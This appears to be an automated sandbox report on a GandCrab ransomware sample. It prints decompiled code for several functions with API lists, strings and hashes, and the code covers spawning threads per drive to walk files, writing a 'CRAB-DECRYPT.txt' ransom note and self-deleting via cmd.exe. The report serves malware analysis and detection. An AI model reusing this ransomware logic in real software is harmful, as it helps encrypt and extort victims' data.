			E0FE672A0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

APIs

lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672F2
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672FD
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67313
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6731E
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67334
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6733F
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67355
lstrlenW.KERNEL32(0FE64B36,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67360
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67376
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67381
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67397
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673A2
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673C1
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673CC
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673E8
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673F6

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 938632407bc70def9149941d817badbade3ce127c2a6bbe5286cffb7b3c60710
Instruction ID: 2de2825cd944226985f45a912520117f934d1012e69d3e23bfacc420370a82f0
Opcode Fuzzy Hash: 938632407bc70def9149941d817badbade3ce127c2a6bbe5286cffb7b3c60710
Instruction Fuzzy Hash: 1741623254061AEFC7525FB9DE9C785B7A2FF047AAF084534E41292A21D736B478DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0FE65F00 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66
stringmemorylibraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0FE65F00(void* __ecx, intOrPtr __edx, void* __esi) {
				CHAR* _v8;
				intOrPtr _v12;
				char _v267;
				char _v268;
				CHAR* _t10;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t20;
				void* _t24;
				void* _t31;
				void* _t35;

				_t10 =  *0xfe72a78; // 0x0
				_v12 = __edx;
				_t24 = __ecx;
				_v8 = _t10;
				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
				if(_t31 != 0) {
					_t13 = GetModuleHandleA("ntdll.dll");
					if(_t13 != 0) {
						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
						_t35 = _t35 + 0xc;
					}
					_v268 = 0;
					E0FE69170( &_v267, 0, 0xff);
					E0FE65DC0( &_v268, _t31, lstrlenA(_t31));
					E0FE65E70( &_v268, _t24, _v12);
					VirtualFree(_t31, 0, 0x8000);
				}
				return _t24;
			}

APIs

VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0FE65F23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0FE65F38
GetProcAddress.KERNEL32(00000000,RtlComputeCrc32), ref: 0FE65F49
lstrlenA.KERNEL32(00000000), ref: 0FE65F54
wsprintfA.USER32 ref: 0FE65F6C
_memset.LIBCMT ref: 0FE65F8B
lstrlenA.KERNEL32(00000000), ref: 0FE65F94
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE65FC3

Strings

%Xeuropol, xrefs: 0FE65F66
ntdll.dll, xrefs: 0FE65F33
RtlComputeCrc32, xrefs: 0FE65F43

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
API String ID: 218840185-1387466253
Opcode ID: 9cee5d2d24d2dca4260546e441231581fe4297ab90e89eb8a244b832401b49aa
Instruction ID: cb87fed37e7eee0e0d6ad8243101f21a1e5ef0b2198f99214217c2e8041d1035
Opcode Fuzzy Hash: 9cee5d2d24d2dca4260546e441231581fe4297ab90e89eb8a244b832401b49aa
Instruction Fuzzy Hash: A01122B1E8030CBBD7205B69AC49FAF7F78AB05B91F140079F904B2281EAB859508B55

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66D40 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE66D40(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\CRAB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xfe72a64; // 0xfe72000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xfe72a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0fe66d5b
0x0fe66d63
0x0fe66d85
0x0fe66d8a
0x0fe66d9e
0x0fe66da5
0x0fe66dbe
0x0fe66dbe
0x0fe66dc5
0x0fe66dcb
0x0fe66d8c
0x0fe66d99
0x0fe66d99
0x0fe66dd8
0x0fe66de6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FE66E22,00000000,?,?), ref: 0FE66D55
wsprintfW.USER32 ref: 0FE66D63
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FE66D7F
GetLastError.KERNEL32(?,?), ref: 0FE66D8C
lstrlenW.KERNEL32(0FE72000,?,00000000,?,?), ref: 0FE66DAE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0FE66DBE
CloseHandle.KERNEL32(00000000,?,?), ref: 0FE66DC5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FE66DD8

Strings

%s\CRAB-DECRYPT.txt, xrefs: 0FE66D5D

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\CRAB-DECRYPT.txt
API String ID: 2985722263-2724392667
Opcode ID: e7ce7ccd8798363c1f4e6188f7cc5661097f36ce85c84bd4e81c8a038c42b5f6
Instruction ID: 48258db9185e2d594848f9103e3968a5cff7a7a59119ef2dab7dc4fd2ece7686
Opcode Fuzzy Hash: e7ce7ccd8798363c1f4e6188f7cc5661097f36ce85c84bd4e81c8a038c42b5f6
Instruction Fuzzy Hash: F00192757803087BF2201B66AD4AF6B375CEB46FA6F100135FB05B91C1DBA869248769

Uniqueness

Uniqueness Score: -1.00%

Function 0FE65350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE65350() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0fe65376
0x0fe6537a
0x0fe6537e
0x0fe65388
0x0fe65390
0x0fe65399
0x0fe653b3
0x0fe653b3
0x0fe65390
0x0fe653bb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FE654E9,00000000,?,?,?,?,0FE65615,00000000,popkadurak,00000000), ref: 0FE65366
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE65378
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE65388
wsprintfW.USER32 ref: 0FE65399
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FE653B3
ExitProcess.KERNEL32 ref: 0FE653BB

Strings

/c timeout -c 5 & del "%s" /f /q, xrefs: 0FE65393
open, xrefs: 0FE653AC
cmd.exe, xrefs: 0FE653A7

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 4fe93ed6d14534b5ca31fa8a6aa8dac9608fdad68d4fc35137723a5261f710b6
Instruction ID: d4a6d934b286cd271360a59bd9b88a0c2d2096f4053104e9048199713f6a8817
Opcode Fuzzy Hash: 4fe93ed6d14534b5ca31fa8a6aa8dac9608fdad68d4fc35137723a5261f710b6
Instruction Fuzzy Hash: E7F030B1BC235833F1311A661C1FF0B3D189B46FB6F241016F704BE1C295E4641087A9

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FE62C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xfe6f290; // 0x21
				asm("movdqu xmm0, [0xfe6f280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0FE62AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0FE62C8A
BeginPaint.USER32(?,?), ref: 0FE62C9F
lstrlenW.KERNEL32(?), ref: 0FE62CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0FE62CBD
EndPaint.USER32(?,?), ref: 0FE62CCB
CreateThread.KERNEL32 ref: 0FE62CE9
DestroyWindow.USER32(?), ref: 0FE62CF2

Strings

GandCrab!, xrefs: 0FE62C5E

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: 3880c87b391473f83b6f4919dfaadd85c52cc398c692b5ee79b81b6d80731d1c
Instruction ID: 5621d5ee1d882da4c9291ac971ac60bfa13147b78d7dcee6e84060a0619a22fd
Opcode Fuzzy Hash: 3880c87b391473f83b6f4919dfaadd85c52cc398c692b5ee79b81b6d80731d1c
Instruction Fuzzy Hash: E811B67254420DABD711DF54EC09FAB7B68FB49762F000626FE41E6190E7719520DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63FF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FE63FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xfe6f350; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0FE66F40, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0FE65670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0FE64010
GetTickCount.KERNEL32 ref: 0FE64035
GetDriveTypeW.KERNEL32(?), ref: 0FE6405A
CreateThread.KERNEL32 ref: 0FE64099
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0FE640DB
GetTickCount.KERNEL32 ref: 0FE640E1

Strings

?:\, xrefs: 0FE64023

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: d5c93081bb0153708442f430ad4c742b94a55cc1ed19a6185afa7aa1e00b5ee0
Instruction ID: a5c5512a9c5225457e45cf8f12b95f0b81f1dde9136b118ce8bc057e4a173ada
Opcode Fuzzy Hash: d5c93081bb0153708442f430ad4c742b94a55cc1ed19a6185afa7aa1e00b5ee0
Instruction Fuzzy Hash: F95177709483049FC310CF18C884B5BBBE5FF89368F505A2EF989AB391D375A944CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE66F40(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0FE66DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0fe66f59
0x0fe66f5f
0x0fe66f6e
0x0fe66f7c
0x0fe66f90
0x0fe66f98
0x0fe66fa0
0x0fe66fa8
0x0fe66fb6
0x0fe66fcb
0x0fe66fdb
0x0fe66fe3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0FE66F59
wsprintfW.USER32 ref: 0FE66F6E
InitializeCriticalSection.KERNEL32(?), ref: 0FE66F7C
VirtualAlloc.KERNEL32 ref: 0FE66FB0

Part of subcall function 0FE66DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FE66E23
Part of subcall function 0FE66DF0: lstrcatW.KERNEL32(00000000,0FE6FF44), ref: 0FE66E3B
Part of subcall function 0FE66DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FE66E45

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0FE66FDB
ExitThread.KERNEL32 ref: 0FE66FE3

Strings

%c:\, xrefs: 0FE66F68

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: 9eb3929d63d617b53883772fdda014fa6f60d87aedc774d80847f505d4d4bbce
Instruction ID: a1571011d64cc7d405b1c040b6e9c972aeea03a594302a02fe552314ee2a4091
Opcode Fuzzy Hash: 9eb3929d63d617b53883772fdda014fa6f60d87aedc774d80847f505d4d4bbce
Instruction Fuzzy Hash: F401D2B0544304BBE7109F11CC8AF1B3BB8EB45B71F004629FB64AE2C1D7B89514CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0FE62890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0FE63030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0FE63030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E0FE63030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E0FE68400(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E0FE62830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,747582B0,00000000,?,?,0FE62C02), ref: 0FE628AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0FE62C02), ref: 0FE628BA
CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0FE62C02), ref: 0FE628E5
CloseHandle.KERNEL32(00000000,?,?,0FE62C02), ref: 0FE628F3
MapViewOfFile.KERNEL32(00000000,747582B1,00000000,00000000,00000000,?,?,0FE62C02), ref: 0FE6290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0FE62C02), ref: 0FE62942
CloseHandle.KERNEL32(?,?,?,0FE62C02), ref: 0FE62951
CloseHandle.KERNEL32(00000000,?,?,0FE62C02), ref: 0FE62954

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
